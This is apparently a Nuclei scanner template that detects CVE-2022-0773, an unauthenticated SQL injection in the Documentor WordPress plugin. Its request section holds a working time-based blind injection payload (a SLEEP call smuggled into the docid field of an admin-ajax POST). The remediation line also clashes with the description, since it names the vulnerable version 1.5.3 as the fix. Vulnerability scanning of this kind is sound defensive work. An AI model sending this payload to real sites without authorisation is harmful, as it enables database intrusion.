id: CVE-2022-0773

info:
  name: Documentor <= 1.5.3 - Unauthenticated SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The Documentor WordPress plugin through 1.5.3 fails to sanitize and escape user input before it is being interpolated in an SQL statement and then executed, leading to an SQL Injection exploitable by unauthenticated users.
  remediation: |
    Update to Documentor version 1.5.3 or later to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/55b89de0-30ed-4f98-935e-51f069faf6fc
    - https://wordpress.org/plugins/documentor-lite/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0773
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0773
    cwe-id: CWE-89
    epss-score: 0.02077
    epss-percentile: 0.87641
    cpe: cpe:2.3:a:documentor_project:documentor:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: documentor_project
    product: documentor
    framework: wordpress
  tags: unauth,cve2022,sqli,wp-plugin,wp,documentor-lite,wpscan,cve,wordpress

http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=doc_search_results&term=&docid=1+AND+(SELECT+6288+FROM+(SELECT(SLEEP(6)))HRaz)
      - |
        GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=6'
          - 'status_code == 200'
          - 'contains(content_type_1, "text/html")'
          - 'contains(body_1, "([])") && contains(body_2, ".documentor-help")'
        condition: and